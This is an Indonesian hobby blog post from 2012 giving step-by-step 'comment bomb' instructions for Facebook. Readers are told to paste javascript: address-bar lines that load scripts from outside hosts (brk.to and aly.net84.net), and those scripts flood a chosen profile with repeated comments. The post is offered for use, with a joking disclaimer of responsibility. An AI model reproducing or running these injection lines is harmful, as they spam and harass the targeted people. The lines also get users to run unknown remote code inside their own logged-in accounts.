Rabu, 15 Februari 2012

0 Membuat Bom Komentar di Facebook


Jangan Lupa Tinggalkan Komentar Kalian Ya...!!!
Siang sobat semua, hari ini saya akan berbagi Tips n Trik untuk Membuat Bom Komentar di Facebook. Mungkin sebagian besar dari sobat semua sudah mengetahui cara ini, tapi tidak ada salahnya saya membaginya disini :). Oke, langsung saja dibahas:





1. Pertaman buka Profil atau Halaman Facebook yang ingin anda kirimkan bom komentar.

2. Copy dan paste-kan salah satu code javascript dibawah ini ke ADDRESS BAR lalu tekan tombol ENTER

Code:

javascript:(a = (b = document).createElement("script")).src = "//brk.to/flood", b.body.appendChild(a); void(0)
Javascript code Bom Wall By Anak-anak Duktek Telkomsel CC Mksr

Code:

javascript:(a = (b = document).createElement("script")).src = "http://aly.net84.net/js.js", b.body.appendChild(a); void(0)

3. Lalu akan muncul sebuah jendela, Masukkan Jumlah Pesan Yang Akan Dikirim, tekan ENTER.

4. Kemudian Masukkan Komentar Anda, ENTER.

5. Tunggu sesaat dan jangan tutup profil teman Facebook anda.

6. Selamat nge-bom !!


Berikut Source codenya:

Disini saya juga mengingatkan, apapun yang terjadi bukan tanggung jawab saya :P, Do at Your Own Risk, oke cukup sekian postingan ini, semoga bermanfaat, bila ada tanggapan silakan kasih komentar dibawah :D. Akhir kata Keep Sharing & Smile.

0 komentar:

1. Good Girl
2. D'MASIF -sudah perih ini
3. Haney Bunny Sweety-G-String.mp3
4. ARMADA-Mau Dibawa Kemana.mp3
5. Ayang Ayangku.mp3
6. Tak Semestinya Kita Berpisah (TSKB).mp3
7. When The Children Cry - White Lion.mp3
Info

Catatan HUGGENG|CYBER

SELAMAT DATANG DI BLOG SAYA :), MAAF KALO DI BLOG INI ISI DARI KONTEN KURANG MENARIK< TETAPI SAYA AKAN MEMBUAT PARA PENGUNJUNG SENANG DI BLOG INI

Sekilas Tentang Admin

Saya Buakanlah Profesional Pembuat Blog Atau Web, Saya Masih Butuh Belajar, Dari Rekan2 Bloger. INFO:
BLOG ANAK INDONESIA UNTUK ANDA SEMUA

Follow

Follow HUGGENG|CYBER

Nikmati Layanan TV Online Gratis di HUGGENG|CYBER *